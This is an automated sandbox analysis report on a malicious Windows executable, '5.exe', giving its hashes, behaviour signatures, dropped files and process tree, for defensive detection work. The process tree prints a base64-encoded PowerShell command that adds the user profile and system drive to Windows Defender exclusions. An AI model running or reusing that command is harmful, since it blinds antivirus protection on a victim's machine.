Analysis
-
max time kernel
302s -
max time network
308s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
31/10/2023, 05:16
Static task
static1
General
-
Target
5.exe
-
Size
10.3MB
-
MD5
b739c3eba37aa9999fb2d15ab5b9c680
-
SHA1
bb18cc561805efa38545310057bcae4e894d3817
-
SHA256
4d3583917fb1f539f92f945f0f298b2c1766ac27086275600eab721b8e9fbd90
-
SHA512
0259b599a7e37426383184110aa828d0797875bab1925186b5b0ca0cb99ed2ae2bceb31f5c83ca3a8ba890bf86bb8cfa75f58d80db3b4ae710828f8ffb36c1ea
-
SSDEEP
196608:56wcPit+w7T+yuSLoGUpTKQ8LY+TRQf3goX3yCJdpHt:5jSKd/+yuQoGUlQepyCJ
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation 5.exe -
Executes dropped EXE 2 IoCs
pid Process 4888 Server.exe 4244 Global Ultra Loade PB [2023].exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3284 powershell.exe 3284 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4888 Server.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe Token: 33 4888 Server.exe Token: SeIncBasePriorityPrivilege 4888 Server.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1464 wrote to memory of 3284 1464 5.exe 94 PID 1464 wrote to memory of 3284 1464 5.exe 94 PID 1464 wrote to memory of 3284 1464 5.exe 94 PID 1464 wrote to memory of 4888 1464 5.exe 96 PID 1464 wrote to memory of 4888 1464 5.exe 96 PID 1464 wrote to memory of 4888 1464 5.exe 96 PID 1464 wrote to memory of 4244 1464 5.exe 97 PID 1464 wrote to memory of 4244 1464 5.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAbQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAZwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAbABqACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe"C:\Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe"2⤵
- Executes dropped EXE
PID:4244
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.2MB
MD58564d4fe3d42c677cef18279c011e18f
SHA19fc9e7f8aec865864eb65d2fa056fb52a8554fab
SHA2562e4ffaed48821bdee7f5fb6bd0d0b5b7231145e40c15d4875aaab01b81dd7fc5
SHA5124ab42cd004255a59cd7e59703af82fe88f293183631179a16624895f48252b0b4f675844ed9615bc3db9a012ea5530366319a6ad8b0cbdeafa758236c9fbd4e0
-
Filesize
10.2MB
MD58564d4fe3d42c677cef18279c011e18f
SHA19fc9e7f8aec865864eb65d2fa056fb52a8554fab
SHA2562e4ffaed48821bdee7f5fb6bd0d0b5b7231145e40c15d4875aaab01b81dd7fc5
SHA5124ab42cd004255a59cd7e59703af82fe88f293183631179a16624895f48252b0b4f675844ed9615bc3db9a012ea5530366319a6ad8b0cbdeafa758236c9fbd4e0
-
Filesize
10.2MB
MD58564d4fe3d42c677cef18279c011e18f
SHA19fc9e7f8aec865864eb65d2fa056fb52a8554fab
SHA2562e4ffaed48821bdee7f5fb6bd0d0b5b7231145e40c15d4875aaab01b81dd7fc5
SHA5124ab42cd004255a59cd7e59703af82fe88f293183631179a16624895f48252b0b4f675844ed9615bc3db9a012ea5530366319a6ad8b0cbdeafa758236c9fbd4e0
-
Filesize
36KB
MD54e6d2de28a77f3e0b709aafe50346ab2
SHA1c4b9ebe731dd45a9d5334b86021565075a0cf13f
SHA2569bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb
SHA51271d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a
-
Filesize
36KB
MD54e6d2de28a77f3e0b709aafe50346ab2
SHA1c4b9ebe731dd45a9d5334b86021565075a0cf13f
SHA2569bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb
SHA51271d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a
-
Filesize
36KB
MD54e6d2de28a77f3e0b709aafe50346ab2
SHA1c4b9ebe731dd45a9d5334b86021565075a0cf13f
SHA2569bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb
SHA51271d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82